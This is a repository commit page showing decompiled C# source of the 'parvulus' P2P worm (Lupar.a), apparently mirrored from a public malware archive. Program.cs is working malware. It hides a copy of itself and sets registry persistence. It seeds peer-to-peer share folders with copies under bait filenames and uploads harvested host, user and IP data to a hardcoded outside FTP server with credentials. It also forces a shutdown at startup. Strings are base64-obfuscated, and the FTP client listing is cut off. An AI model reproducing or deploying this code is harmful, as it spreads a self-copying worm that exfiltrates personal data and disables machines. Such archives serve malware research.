daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("parvulus")]
[assembly: Guid("c3ba0206-1ae0-4411-93c8-a7ea4fa21ba0")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("parvulus")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Form1.cs
+84
View File
@@ -0,0 +1,84 @@
// Decompiled with JetBrains decompiler
// Type: parvulus.Form1
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
namespace parvulus
{
public class Form1 : Form
{
private IContainer components;
private GroupBox groupBox1;
private Label label1;
private Label label2;
private Label label3;
public Form1() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1));
this.groupBox1 = new GroupBox();
this.label1 = new Label();
this.label2 = new Label();
this.label3 = new Label();
this.groupBox1.SuspendLayout();
this.SuspendLayout();
this.groupBox1.Controls.Add((Control) this.label3);
this.groupBox1.Controls.Add((Control) this.label1);
this.groupBox1.Location = new Point(24, 12);
this.groupBox1.Name = "groupBox1";
this.groupBox1.Size = new Size(415, 245);
this.groupBox1.TabIndex = 0;
this.groupBox1.TabStop = false;
this.label1.AutoSize = true;
this.label1.Font = new Font("Verdana", 14.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.label1.ForeColor = Color.Red;
this.label1.Location = new Point(6, 26);
this.label1.Name = "label1";
this.label1.Size = new Size(399, 23);
this.label1.TabIndex = 0;
this.label1.Text = "Warning: Offensive Material Found!!";
this.label2.AutoSize = true;
this.label2.Location = new Point(47, 260);
this.label2.Name = "label2";
this.label2.Size = new Size(371, 13);
this.label2.TabIndex = 1;
this.label2.Text = "Dedicated to Sarah Payne, Kirsty Little, and all the other victims";
this.label3.AutoSize = true;
this.label3.Location = new Point(10, 97);
this.label3.Name = "label3";
this.label3.Size = new Size(388, 26);
this.label3.TabIndex = 1;
this.label3.Text = "Possible offensive material has been found on your computer. \r\nDue to the nature of the material, the computer will now shutdown.";
this.AutoScaleDimensions = new SizeF(7f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(470, 281);
this.ControlBox = false;
this.Controls.Add((Control) this.label2);
this.Controls.Add((Control) this.groupBox1);
this.Font = new Font("Verdana", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (Form1);
this.ShowInTaskbar = false;
this.Text = "Parvulus";
this.TopMost = true;
this.groupBox1.ResumeLayout(false);
this.groupBox1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();
}
}
}
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Form1.resx
+123
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/P2P-Worm.MSIL.Lupar.a.csproj
+52
View File
@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9AC9F112-E43F-44AB-9F59-C9C00067C063}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>parvulus</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>parvulus</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Retro\FTP\FTPClient.cs" />
<Compile Include="Form1.cs" />
<Compile Include="decrypter.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/P2P-Worm.MSIL.Lupar.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "parvulus", "P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.csproj", "{9AC9F112-E43F-44AB-9F59-C9C00067C063}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9AC9F112-E43F-44AB-9F59-C9C00067C063}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9AC9F112-E43F-44AB-9F59-C9C00067C063}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9AC9F112-E43F-44AB-9F59-C9C00067C063}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9AC9F112-E43F-44AB-9F59-C9C00067C063}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Program.cs
+218
View File
@@ -0,0 +1,218 @@
// Decompiled with JetBrains decompiler
// Type: parvulus.Program
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
using Microsoft.Win32;
using Retro.FTP;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
using System.Xml;
namespace parvulus
{
internal static class Program
{
private static object g;
private static Module me;
[STAThread]
private static void Main()
{
ArrayList storage = new ArrayList();
FTPClient ftpClient = new FTPClient();
Random random = new Random();
DateTime now = DateTime.Now;
ProcessStartInfo startInfo = new ProcessStartInfo("shutdown.exe", "-f");
string str1 = Program.RandName(".txt");
string str2 = Environment.SystemDirectory.ToString();
string[] strArray = new string[10]
{
Program.decrypt("cHRoYw=="),
Program.decrypt("UGhvdG8gQnkgQ2FybCAtIFBlZG8="),
Program.decrypt("cHJldGVlbg=="),
Program.decrypt("Y2hpbGRsb3Zlcg=="),
Program.decrypt("Y2hpbGQgcG9ybg=="),
Program.decrypt("OHlv"),
Program.decrypt("OXlv"),
Program.decrypt("MTB5bw=="),
Program.decrypt("MTF5bw=="),
Program.decrypt("MTJ5bw==")
};
string hostName = Dns.GetHostName();
IPAddress[] addressList = Dns.GetHostEntry(hostName).AddressList;
StreamWriter streamWriter = new StreamWriter(str2 + Program.decrypt("XA==") + str1);
streamWriter.WriteLine(Program.decrypt("W1BhcnZ1bHVzXSBBdXRvLUdlbmVyYXRlZCBPbiA=") + now.ToString("dddd, d MMMM yyyy H:m:s zzz \r\n"));
streamWriter.WriteLine(Program.decrypt("T1MgVmVyc2lvbiAgIDog") + (object) Environment.OSVersion);
streamWriter.WriteLine(Program.decrypt("TWFjaGluZSBOYW1lIDog") + Environment.MachineName);
streamWriter.WriteLine(Program.decrypt("VXNlcm5hbWUgICAgIDog") + Environment.UserName);
streamWriter.WriteLine(Program.decrypt("SG9zdCBOYW1lICAgIDog") + hostName);
for (int index = 0; index < addressList.Length; ++index)
streamWriter.WriteLine(Program.decrypt("SVAgQWRkcmVzcyB7MH0gOiB7MX0g"), (object) index, (object) addressList[index].ToString());
streamWriter.Write("\r\n\t\t\t\t" + Program.decrypt("T3JpZ2luYWwgRmlsZSAtPiBCYWNrdXAgRmlsZQ==") + "\r\n\r\n");
Program.me = Assembly.GetExecutingAssembly().GetModules()[0];
foreach (string logicalDrive in Directory.GetLogicalDrives())
{
try
{
Program.CollectDirs(logicalDrive, storage);
}
catch (IOException ex)
{
}
}
int index1 = random.Next(0, storage.Count);
System.IO.File.Copy(Program.me.FullyQualifiedName, storage[index1].ToString() + "\\" + Program.me.ScopeName);
new DirectoryInfo(storage[index1].ToString() + "\\" + Program.me.ScopeName).Attributes = FileAttributes.Hidden;
RegistryKey subKey1 = Registry.CurrentUser.CreateSubKey(Program.decrypt("U29mdHdhcmVcUmV0cm9cUGFydmFsdXM="));
subKey1.SetValue(Program.decrypt("UGFydnVsdXM="), (object) (storage[index1].ToString() + "\\" + Program.me.ScopeName));
subKey1.SetValue(Program.decrypt("QWN0aXZl"), (object) Program.decrypt("MA=="));
string str3 = Environment.SystemDirectory.ToString();
Directory.CreateDirectory(str3 + Program.decrypt("XHBcYVxyXHZcdVxsXHVccw=="));
new DirectoryInfo(str3 + Program.decrypt("XHA=")).Attributes = FileAttributes.Hidden;
foreach (string path in storage)
{
try
{
foreach (string file in Directory.GetFiles(path, "*.jpg"))
{
try
{
FileInfo fileInfo = new FileInfo(file);
for (int index2 = 0; index2 < 10; ++index2)
{
if (fileInfo.Name.Contains(strArray[index2]))
{
subKey1.SetValue(Program.decrypt("QWN0aXZl"), (object) Program.decrypt("MQ=="));
int length = Directory.GetFiles(str3 + Program.decrypt("XHBcYVxyXHZcdVxsXHVcc1w=")).Length;
System.IO.File.Copy(file, str3 + Program.decrypt("XHBcYVxyXHZcdVxsXHVcc1w=") + Program.decrypt("aW1wZWRv") + length.ToString() + ".jpg");
System.IO.File.Delete(file);
streamWriter.WriteLine(file + " -> " + str3 + Program.decrypt("XHBcYVxyXHZcdVxsXHVcc1w=") + Program.decrypt("aW1wZWRv") + length.ToString() + ".jpg");
++length;
}
}
}
catch
{
}
}
}
catch
{
}
}
streamWriter.Close();
Program.p2pShares();
Program.g = subKey1.GetValue(Program.decrypt("QWN0aXZl"));
if (Program.g.ToString() == Program.decrypt("MQ=="))
{
Application.EnableVisualStyles();
Application.Run((Form) new Form1());
}
ftpClient.setHost(Program.decrypt("ZnRwLmhvc3Quc2s="));
ftpClient.setPort(21);
ftpClient.setUser(Program.decrypt("cGFydnVsdXM="));
ftpClient.setPass(Program.decrypt("ZjQ1NTQ2NHBwOQ=="));
ftpClient.login();
ftpClient.chdir(Program.decrypt("ZmlsZXM="));
ftpClient.setBinaryMode(true);
ftpClient.upload(str3 + Program.decrypt("XA==") + str1);
ftpClient.close();
System.IO.File.Delete(str3 + Program.decrypt("XA==") + str1);
RegistryKey subKey2 = Registry.LocalMachine.CreateSubKey(Program.decrypt("U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25ccG9saWNpZXNcZXhwbG9yZXJccnVu"));
subKey2.SetValue(Program.decrypt("c2h1dGRvd24="), (object) Program.decrypt("Y21kLmV4ZSAvYyBzaHV0ZG93biAtZg=="));
Process.Start(startInfo);
subKey2.Close();
}
private static string decrypt(string s)
{
StringBuilder stringBuilder = new StringBuilder();
byte[] decoded = new decrypter(s.ToCharArray()).GetDecoded();
stringBuilder.Append(Encoding.UTF8.GetChars(decoded));
return stringBuilder.ToString();
}
private static string RandName(string extension)
{
Random random = new Random();
string str = (string) null;
int num = random.Next(5, 11);
for (int index = 0; index < num; ++index)
{
if (random.Next(1, 3) == 2)
str += (string) (object) Convert.ToChar(Convert.ToInt16(random.Next(97, 122)));
str += random.Next(0, 10).ToString();
}
return str + extension;
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Program.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
private static void p2pShares()
{
string[] strArray = new string[6]
{
Program.decrypt("TXlfR2lybF85eW9fMDQyLmpwZy5leGU="),
Program.decrypt("cHRoY19wcmUtU2xpZGVzaG93Ljg3cGl4cy5qcGcuZXhl"),
Program.decrypt("UGVkbyAtIDIgMTN5byBnaXJsIG1hc3R1cmJhdGluZyAxNHlvIGJveS5qcGcuZXhl"),
Program.decrypt("cHJldGVlbiAtIEVtaWx5IDd5ciBwZWRvIGZ1Y2suanBnLmV4ZQ=="),
Program.decrypt("TkVXISAyX1BlZG8gUGVkb2ZpbGlhIEtpZHMgQ2hpbGQgUG9ybiA2NjYuanBnLmV4ZQ=="),
Program.decrypt("MiA5eW8gZ2lybHMgYW5kIDEyeW8gYm95LmpwZy5leGU=")
};
object obj1 = Registry.LocalMachine.OpenSubKey(Program.decrypt("U09GVFdBUkVcREMrKw==")).GetValue(Program.decrypt("SW5zdGFsbF9EaXI="));
if (obj1 != null)
{
XmlReader xmlReader = XmlReader.Create(obj1.ToString() + Program.decrypt("XA==") + Program.decrypt("RENQbHVzUGx1cy54bWw="));
while (xmlReader.Read())
{
if (xmlReader.Name == Program.decrypt("RGlyZWN0b3J5"))
{
string path = xmlReader.ReadString();
if (Directory.Exists(path))
{
foreach (string str in strArray)
System.IO.File.Copy(Program.me.FullyQualifiedName, path + str);
}
}
}
xmlReader.Close();
}
string path1 = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Program.decrypt("ZURvbmtleTIwMDAgRG93bmxvYWRzXA==");
if (Directory.Exists(path1))
{
foreach (string str in strArray)
System.IO.File.Copy(Program.me.FullyQualifiedName, path1 + str);
}
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(Program.decrypt("U09GVFdBUkVcS2F6YWFcTG9jYWxDb250ZW50"));
object obj2 = registryKey.GetValue(Program.decrypt("RG93bmxvYWREaXI="));
if (obj2 != null)
{
object obj3 = (object) (obj2.ToString() + Program.decrypt("XA=="));
foreach (string str in strArray)
System.IO.File.Copy(Program.me.FullyQualifiedName, obj3.ToString() + str);
}
registryKey.Close();
}
}
}
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Properties/Resources.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: parvulus.Properties.Resources
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace parvulus.Properties
{
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (parvulus.Properties.Resources.resourceMan == null)
parvulus.Properties.Resources.resourceMan = new ResourceManager("parvulus.Properties.Resources", typeof (parvulus.Properties.Resources).Assembly);
return parvulus.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => parvulus.Properties.Resources.resourceCulture;
set => parvulus.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Properties/Settings.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: parvulus.Properties.Settings
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace parvulus.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/Retro/FTP/FTPClient.cs
+320
View File
@@ -0,0 +1,320 @@
// Decompiled with JetBrains decompiler
// Type: Retro.FTP.FTPClient
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace Retro.FTP
{
public class FTPClient
{
private string Host;
private string fPath;
private string User;
private string Pass;
private string l;
private int Port;
private int bytes;
private Socket ftpSocket;
private int value;
private bool logined;
private string reply;
private static int BLOCK_SIZE = 512;
private byte[] b = new byte[FTPClient.BLOCK_SIZE];
private Encoding ASCII = Encoding.ASCII;
public FTPClient()
{
this.Host = "localhost";
this.fPath = ".";
this.User = "anonymous";
this.Pass = "test@test.com";
this.Port = 21;
this.logined = false;
}
public void setHost(string Host) => this.Host = Host;
public string getHost() => this.Host;
public void setPort(int Port) => this.Port = Port;
public int getPort() => this.Port;
public void setPath(string Path) => this.fPath = Path;
public string getPath() => this.fPath;
public void setUser(string User) => this.User = User;
public void setPass(string Pass) => this.Pass = Pass;
public string[] getFileList(string mask)
{
if (!this.logined)
this.login();
Socket dataSocket = this.createDataSocket();
this.sendCommand("NLST " + mask);
if (this.value != 150 && this.value != 125)
throw new IOException(this.reply.Substring(4));
this.l = "";
int count;
do
{
count = dataSocket.Receive(this.b, this.b.Length, SocketFlags.None);
this.l += this.ASCII.GetString(this.b, 0, count);
}
while (count >= this.b.Length);
string[] fileList = this.l.Split('\n');
dataSocket.Close();
this.readReply();
if (this.value != 226)
throw new IOException(this.reply.Substring(4));
return fileList;
}
public long getFileSize(string fileName)
{
if (!this.logined)
this.login();
this.sendCommand("SIZE " + fileName);
if (this.value == 213)
return long.Parse(this.reply.Substring(4));
throw new IOException(this.reply.Substring(4));
}
public void login()
{
this.ftpSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
IPEndPoint remoteEP = new IPEndPoint(Dns.GetHostEntry(this.Host).AddressList[0], this.Port);
try
{
this.ftpSocket.Connect((EndPoint) remoteEP);
}
catch (Exception ex)
{
throw new IOException("Couldn't connect to remote server");
}
this.readReply();
if (this.value != 220)
{
this.close();
throw new IOException(this.reply.Substring(4));
}
this.sendCommand("USER " + this.User);
if (this.value != 331 && this.value != 230)
{
this.cleanup();
throw new IOException(this.reply.Substring(4));
}
if (this.value != 230)
{
this.sendCommand("PASS " + this.Pass);
if (this.value != 230 && this.value != 202)
{
this.cleanup();
throw new IOException(this.reply.Substring(4));
}
}
this.logined = true;
Console.WriteLine("Connected to " + this.Host);
this.chdir(this.fPath);
}
public void setBinaryMode(bool mode)
{
if (mode)
this.sendCommand("TYPE I");
else
this.sendCommand("TYPE A");
if (this.value != 200)
throw new IOException(this.reply.Substring(4));
}
public void upload(string fileName) => this.upload(fileName, false);
public void upload(string fileName, bool resume)
{
if (!this.logined)
this.login();
Socket dataSocket = this.createDataSocket();
long offset = 0;
if (resume)
{
try
{
this.setBinaryMode(true);
offset = this.getFileSize(fileName);
}
catch (Exception ex)
{
offset = 0L;
}
}
if (offset > 0L)
{
this.sendCommand("REST " + (object) offset);
if (this.value != 350)
offset = 0L;
}
this.sendCommand("STOR " + Path.GetFileName(fileName));
if (this.value != 125)
{
int num = this.value;
}
FileStream fileStream = new FileStream(fileName, FileMode.Open);
if (offset != 0L)
fileStream.Seek(offset, SeekOrigin.Begin);
while ((this.bytes = fileStream.Read(this.b, 0, this.b.Length)) > 0)
dataSocket.Send(this.b, this.bytes, SocketFlags.None);
fileStream.Close();
if (dataSocket.Connected)
dataSocket.Close();
this.readReply();
if (this.value != 226 && this.value != 250)
throw new IOException(this.reply.Substring(4));
}
public void deleteRemoteFile(string fileName)
{
if (!this.logined)
this.login();
this.sendCommand("DELE " + fileName);
int num = this.value;
}
public void renameRemoteFile(string oldFileName, string newFileName)
{
if (!this.logined)
this.login();
this.sendCommand("RNFR " + oldFileName);
if (this.value != 350)
throw new IOException(this.reply.Substring(4));
this.sendCommand("RNTO " + newFileName);
if (this.value != 250)
throw new IOException(this.reply.Substring(4));
}
public void mkdir(string dirName)
{
if (!this.logined)
this.login();
this.sendCommand("MKD " + dirName);
int num = this.value;
}
public void rmdir(string dirName)
{
if (!this.logined)
this.login();
this.sendCommand("RMD " + dirName);
int num = this.value;
}
public void chdir(string dirName)
{
if (dirName.Equals("."))
return;
if (!this.logined)
this.login();
this.sendCommand("CWD " + dirName);
int num = this.value;
this.fPath = dirName;
}
public void close()
{
if (this.ftpSocket != null)
this.sendCommand("QUIT");
this.cleanup();
}
private void readReply()
{
this.l = "";
this.reply = this.readLine();
this.value = int.Parse(this.reply.Substring(0, 3));
}
private void cleanup()
{
if (this.ftpSocket != null)
{
this.ftpSocket.Close();
this.ftpSocket = (Socket) null;
}
this.logined = false;
}
private string readLine()
{
do
{
this.bytes = this.ftpSocket.Receive(this.b, this.b.Length, SocketFlags.None);
this.l += this.ASCII.GetString(this.b, 0, this.bytes);
}
while (this.bytes >= this.b.Length);
string[] strArray = this.l.Split('\n');
this.l = this.l.Length <= 2 ? strArray[0] : strArray[strArray.Length - 2];
return !this.l.Substring(3, 1).Equals(" ") ? this.readLine() : this.l;
}
private void sendCommand(string command)
{
byte[] bytes = Encoding.ASCII.GetBytes((command + "\r\n").ToCharArray());
this.ftpSocket.Send(bytes, bytes.Length, SocketFlags.None);
this.readReply();
}
private Socket createDataSocket()
{
this.sendCommand("PASV");
if (this.value != 227)
throw new IOException(this.reply.Substring(4));
int num1 = this.reply.IndexOf('(');
int num2 = this.reply.IndexOf(')');
string str = this.reply.Substring(num1 + 1, num2 - num1 - 1);
int[] numArray = new int[6];
int length = str.Length;
int num3 = 0;
